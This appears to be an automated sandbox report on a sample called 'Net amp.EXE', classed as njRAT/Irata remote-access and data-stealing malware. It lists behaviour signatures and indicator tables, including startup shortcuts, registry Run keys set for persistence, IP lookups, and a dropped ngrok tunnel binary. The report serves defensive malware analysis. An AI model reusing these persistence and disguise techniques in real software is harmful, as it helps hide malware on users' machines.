Malware Analysis Report

2025-01-19 06:08

Sample ID 231218-yw2tesfac7
Target Net amp.EXE
SHA256 b79a1275b2ea72d2c67cf5377241ab159d2f5dd523f811196c16d50f4e65cf5c
Tags
irata njrat samoda infostealer persistence rat trojan discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b79a1275b2ea72d2c67cf5377241ab159d2f5dd523f811196c16d50f4e65cf5c

Threat Level: Known bad

The file Net amp.EXE was found to be: Known bad.

Malicious Activity Summary

irata njrat samoda infostealer persistence rat trojan discovery spyware stealer

njRAT/Bladabindi

Irata payload

Irata

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Drops startup file

Loads dropped DLL

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Checks processor information in registry

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Views/modifies file attributes

Uses Volume Shadow Copy WMI provider

Suspicious use of SetWindowsHookEx

NTFS ADS

Suspicious use of FindShellTrayWindow

Enumerates processes with tasklist

Suspicious use of SendNotifyMessage

Collects information from the system

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 20:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 20:08

Reported

2023-12-18 20:39

Platform

win7-20231129-en

Max time kernel

312s

Max time network

729s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Net amp.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A

njRAT/Bladabindi

trojan njrat

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\Net amp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\System Settings Broker.exe" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2816 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
PID 2816 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
PID 2816 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
PID 2816 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
PID 2816 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
PID 2816 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
PID 2816 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
PID 2712 wrote to memory of 2740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2532 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2788 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2788 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2712 wrote to memory of 2788 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
